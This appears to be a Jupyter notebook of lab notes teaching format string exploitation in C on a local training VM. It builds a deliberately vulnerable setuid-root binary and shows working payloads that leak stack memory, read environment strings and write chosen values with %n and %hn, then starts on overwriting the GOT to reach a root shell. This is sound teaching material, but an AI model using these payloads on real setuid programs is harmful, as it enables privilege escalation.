# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- hello.c program uses `printf()` incorrectly!
- "Hello World\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [15]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-rw-r-- 1 seed seed 78 Aug  8 18:47 hello.c


In [18]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

In [16]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [17]:
! hello.exe

Hello World!


## Format Parameters Example
- %n - uncommon, but let's understand how it works

In [3]:
! cp booksrc/fmt_uncommon.c .

In [4]:
cat fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0);
}	


In [5]:
! ./compile.sh fmt_uncommon.c fmt_uncommon.exe

fmt_uncommon.c: In function ‘main’:
fmt_uncommon.c:14:11: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 3 has type ‘int *’ [-Wformat=]
    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
           ^


In [6]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bfffec98.  B is 7.


### what do you think the structure of stack when printf() is called in fmt_common.c?
- look at the last printf()
- hint, parameters are pushed on reverse order

### what if only two arguments are passed to printf()?
- printf("A is %d and is at %08x. B is %x.\n", A, &A);

In [7]:
! sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

In [10]:
! diff fmt_uncommon.c fmt_uncommon2.c

14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [11]:
! ./compile.sh fmt_uncommon2.c fmt_uncommon2.exe

fmt_uncommon2.c: In function ‘main’:
fmt_uncommon2.c:14:11: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 3 has type ‘int *’ [-Wformat=]
    printf("A is %d and is at %08x.  B is %x.\n", A, &A);
           ^
fmt_uncommon2.c:14:11: warning: format ‘%x’ expects a matching ‘unsigned int’ argument [-Wformat=]


In [12]:
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at bfffec98.  B is 804850b.


## The Format String Vulnerability
- using `printf(string)` instead of `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

- print four repeating bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - these are the arguments for format string stored in higher memory addresses

In [48]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}


In [ ]:
! ./compile.sh fmt_vuln.c fmt_vuln.exe

In [33]:
# dees is password for sudo user
! echo dees | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for seed: 

In [34]:
# check ownership of the fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [35]:
! echo dees | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for seed: 

In [36]:
! ls -al fmt_vuln.exe

-rwsrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [38]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [39]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [43]:
# what if you provide %s as value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbfffe840
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [44]:
! ./fmt_vuln.exe testing%s
# notice testing repeats twice!

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [46]:
# process can be used repeatedly to examine stack memory
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bfffe780.00000000.b7fff858.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [49]:
! fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:
Segmentation fault


In [57]:
# bunch of 2e78383025 are repeated
# each four bytes values are reversed due to little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
```bash
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%08x
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s # get segfault
```
- if a valid memory address is used, this process could be used to read a string found at that memory address
```bash
$ env | grep $PATH
```
- compile and run booksrc/getenvaddr.c
```bash
$ ./compile.sh getenvaddr.c getenvaddr
$ ./getenvaddr PATH ./fmt_vuln.exe
```
- use the path address to provide the value for %s
```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x.%08x.%08x.%s
```

In [60]:
! ./fmt_vuln.exe AAAA.%08x.%08x.%08x.%08x
# notice that fourth parameter is repeating from begnning of the format string 
# AAAA to gets its data

The right way to print user-controlled input:
AAAA.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA.bfffe830.00000000.b7fff858.41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [62]:
! ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s
# why do we get segfault?

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
Segmentation fault


In [63]:
# how about we provide some valid memory address in memory AAAA
! env | grep $PATH

PATH=/usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin


In [64]:
# compile and run getevnaddr.c to find the memory address of env variables respective to programs
! cp ./booksrc/getenvaddr.c .

In [65]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [66]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [68]:
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xbffff3a0


In [89]:
# lets try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(perl -e 'print "\xa0\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858.sr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [79]:
! printf "%x" $((0xa0-2))

9e

In [88]:
! ./fmt_vuln.exe $(perl -e 'print "\x9e\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858./usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Writing to Arbitrary Memory Addresses
- `%n` format parameter can be used to write to arbitrary memory address
- `test_val` variable has been printing its address and value in the debug statement
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%08x.%08x.%08x.%n
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%100x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%400x%n
```

In [85]:
! fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [87]:
# test_val is @ 0x0804a02c
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%08x.%08x.%08x.%n

The right way to print user-controlled input:
,�%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
,�bfffe830.00000000.b7fff858.
[*] test_val @ 0x0804a02c = 31 0x0000001f


In [86]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%x.%n

The right way to print user-controlled input:
,�%x.%x.%x.%n
The wrong way to print user-controlled input:
,�bfffe840.0.b7fff858.
[*] test_val @ 0x0804a02c = 24 0x00000018


In [90]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%100x.%n

The right way to print user-controlled input:
,�%x.%x.%100x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                            b7fff858.
[*] test_val @ 0x0804a02c = 116 0x00000074


In [91]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%200x.%n

The right way to print user-controlled input:
,�%x.%x.%200x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                                                                                                                                b7fff858.
[*] test_val @ 0x0804a02c = 216 0x000000d8


## Writing User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- 0xAA -> 0x0804a02c
- 0xBB -> 0x0804a02d
- 0xCC -> 0x0804a02e
- 0xDD -> 0x0804a02f

```bash
$ printf "%d\n" $((0xaa - 28 + 8)) # 150
or
$ echo $((0xaa - 28 + 8))
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08")%x%x%8x%n #52
$ echo $((0xaa-52+8)) #126
```

In [95]:
# findout the width value for 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�%x%x%8x%n
The wrong way to print user-controlled input:
,�bfffe8400b7fff858
[*] test_val @ 0x0804a02c = 21 0x00000015


In [98]:
# 0xaa is final value - 21 is what width 8 provides
!echo $(( 0xaa - 21 + 8))

157


In [97]:
# replace width 8 with 157
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%157x%n
# text_val = 0x000000aa

The right way to print user-controlled input:
,�%x%x%157x%n
The wrong way to print user-controlled input:
,�bfffe8400                                                                                                                                                     b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [99]:
# next write 0xbb, 0xcc, and 0xdd
# need more %x%n format to write to each addresses
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200b7fff858
[*] test_val @ 0x0804a02c = 45 0x0000002d


In [100]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-45+8 ))

133


In [101]:
# replace with 8 with 133 to write
# force to write 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [102]:
! echo $(( 0xbb - 0xaa ))

17


In [103]:
# now write 0xbb in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858         4b4e554a
[*] test_val @ 0x0804a02c = 48042 0x0000bbaa


In [104]:
! echo $(( 0xcc - 0xbb ))

17


In [105]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = 13417386 0x00ccbbaa


In [ ]:
# finally write 0xdd

In [106]:
! echo $(( 0xdd - 0xcc ))

17


In [107]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = -573785174 0xddccbbaa


## Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using the dollar sign qualifier
    - e.g., `%n$d` would access the nth parameter and display it as a decimal number
- instead of sequentially accessing the first three parameters and using 4 bytes spacers of JUNK increment the byte output count, can used direct parameter access
- e.g., write a more realistic-looking address of `0xbffffd72` into the variable test_vals

In [1]:
#include <stdio.h>
int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
}

/tmp/tmpga_vbkob.c: In function ‘main’:
/tmp/tmpga_vbkob.c:3:12: warning: format argument 1 unused before used argument 7 in $-style format [-Wformat=]
     printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
            ^
/tmp/tmpga_vbkob.c:3:12: warning: format argument 2 unused before used argument 7 in $-style format [-Wformat=]
/tmp/tmpga_vbkob.c:3:12: warning: format argument 3 unused before used argument 7 in $-style format [-Wformat=]
/tmp/tmpga_vbkob.c:3:12: warning: format argument 5 unused before used argument 7 in $-style format [-Wformat=]
/tmp/tmpga_vbkob.c:3:12: warning: format argument 6 unused before used argument 7 in $-style format [-Wformat=]
/tmp/tmpga_vbkob.c:3:12: warning: unused arguments in $-style format [-Wformat-extra-args]


7th: 70, 4th: 00040


In [1]:
# lets use direct parameter access with fmt_vuln.exe
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbfffe8400b7fff85841414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [1]:
# access the fourth argument (beginning of the format string)
# $ sign is special character so must be escaped
! ./fmt_vuln.exe AAAA%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [3]:
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�%4$n
The wrong way to print user-controlled input:
,�
[*] test_val @ 0x0804a02c = 4 0x00000004


In [6]:
# no need of JUNK just use direct parameter access to write the rest
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�-�.�/�%4$n
The wrong way to print user-controlled input:
,�-�.�/�
[*] test_val @ 0x0804a02c = 16 0x00000010


In [1]:
# do some math to print 0x72 of our controlled address: 0xbffffd72
! echo $((0x72 - 16))

98


In [7]:
# use 98 as width to get 0x72 as least significant value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          bfb097e0
[*] test_val @ 0x0804a02c = 114 0x00000072


In [8]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
! echo $((0xfd-0x72))

139


In [9]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          bf81fa40                                                                                                                                          0
[*] test_val @ 0x0804a02c = 64882 0x0000fd72


In [10]:
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0xff-0xfd))

2


In [12]:
# width of 2 doesn't work!
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0x1ff-0xfd))

258


In [13]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          bfa3b200                                                                                                                                          0                                                                                                                                                                                                                                                          b7794858
[*] test_val @ 0x0804a02c = 33553778 0x01fffd72


In [14]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
! echo $((0xbf-0xff))

-64


In [15]:
# negative width will not work!
! echo $((0x1bf-0xff))

192


In [16]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          bfd17370                                                                                                                                          0                                                                                                                                                                                                                                                          b7728858                                                                                                                                                                                         804a02c
[*] test_val @ 0x0804a02c = -1073742478 0xbffffd72


## Using Short Writes
- a `short` is typically a two-byte word using `h`
- helps write an entire four-byte value with just two `%hn` parameters
- let's overwrite test_val variable with the address `0xbffffd72`

In [19]:
# update first two bytes starting
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�bfb3ac400b774e858
[*] test_val @ 0x0804a02c = -65515 0xffff0015


In [8]:
# short write can be used with direct parameter access
# update last two bytes
! ./fmt_vuln.exe $(perl -e 'print "\x2e\xa0\x04\x08"')%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804a02c = 327608 0x0004ffb8


In [20]:
# lets write 0xbffffd72 to test_val
# 0xfd72 is written in first two (lower) bytes
# Since 8 bytes of memory addresses will be written, subtract it from actual
#  ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08\x2e\xa0\x04\x08")%[w]x%4\$hn%[w]x%5\%hn
! echo $((0xfd72-8))

64874


In [21]:
# 0xbfff is written in last two (higher bytes)
! echo $((0xbfff-0xfd72))

-15731


In [23]:
# smaller than previous width so..
! echo $((0x1bfff-0xfd72))

49805


In [25]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08\x2e\xa0\x04\x08"')%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

## Control the execution flow of the program...
- overwrite the return address in the most recent stack frame
- stack-based overflow only allows overflowing return address
- format string vulnerability provides the ability to overwrite any memory address!!

### Detours with .dtors
#### .dtors and .ctors are called something different and not sure in modern gcc
#### !!!ignoring!!!
- in GNU C compiled prorams, special table sections called .dtors and .ctors are created
- .dtors are made for destructors
- .ctors are made for constructors
- a function can be declared as a destructor function by defining the destructor attribute
- let's see dtors_sample.c

In [14]:
! cp ./booksrc/dtors_sample.c .

In [15]:
! cat dtors_sample.c

#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n");
}


In [16]:
! compile.sh dtors_sample.c dtors_sample.exe

In [19]:
! ./dtors_sample.exe

Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..


In [21]:
# nm command can be used to find the address of the cleanup()
# look for __DTOR_LIST__ and __DTOR_END__ 
# wont' find it!!

! nm ./dtors_sample.exe

0804a020 B __bss_start
08048476 t cleanup
0804a020 b completed.7200
0804a018 D __data_start
0804a018 W data_start
08048380 t deregister_tm_clones
080483f0 t __do_global_dtors_aux
08049f08 t __do_global_dtors_aux_fini_array_entry
0804a01c D __dso_handle
08049f14 d _DYNAMIC
0804a020 D _edata
0804a024 B _end
         U exit@@GLIBC_2.0
080484f4 T _fini
08048508 R _fp_hw
08048410 t frame_dummy
08049f04 t __frame_dummy_init_array_entry
080486ac r __FRAME_END__
0804a000 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
08048598 r __GNU_EH_FRAME_HDR
080482c8 T _init
08049f08 t __init_array_end
08049f04 t __init_array_start
0804850c R _IO_stdin_used
         w _ITM_deregisterTMCloneTable
         w _ITM_registerTMCloneTable
08049f10 d __JCR_END__
08049f10 d __JCR_LIST__
         w _Jv_RegisterClasses
080484f0 T __libc_csu_fini
08048490 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
0804843b T main
         U puts@@GLIBC_2.0
080483b0 t register_tm_clones
08048340 T _start
0804a020 D _

In [26]:
! nm ./dtors_sample.exe | grep DTOR

In [31]:
! nm ./fmt_vuln.exe | grep DTOR

In [24]:
# display all section headers
!readelf -S dtors_sample.exe

There are 36 section headers, starting at offset 0x1afc:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804822c 00022c 00004f 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804827c 00027c 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         08048288 000288 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             080482a8 0002a8 000008 08   A  5   0  4
  [10] .rel.plt          REL      

In [27]:
# objdump command shows the actual contents of the .dtors section
! objdump -s -j .dtors ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

objdump: section '.dtors' mentioned in a -j option, but not found in any input file


In [29]:
! objdump -h ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048154  08048154  00000154  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048168  08048168  00000168  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.gnu.build-id 00000024  08048188  08048188  00000188  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.hash     00000020  080481ac  080481ac  000001ac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynsym       00000060  080481cc  080481cc  000001cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynstr       0000004f  0804822c  0804822c  0000022c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version  0000000c  0804827c  0804827c  0000027c  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version_r 00000020  08048288  0

## Overwriting the Global Offset Table
- PLT (procedure linkage table) is used to store shared library
- consists of many jump instructions each one corresponding to the address of a function
- each time a shared function needs to be called, control will pass through the PLT
- objdump program can be used to see .plt section
- exit() is called at the end of the program
- if exit() function can be manipulated to direct the execution flow into shellcode, a root shell will be spawned
- most of the functions are not jumping to addresses but to pointers to addresses
    - e.g., exit() function's address is stored at `0x0804a018`
- these addresses exist in another section, called the global offset table (GOT) which is writable

In [1]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08048350 <printf@plt-0x10>:
 8048350:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048356:	ff 25 08 a0 04 08    	jmp    *0x804a008
 804835c:	00 00                	add    %al,(%eax)
	...

08048360 <printf@plt>:
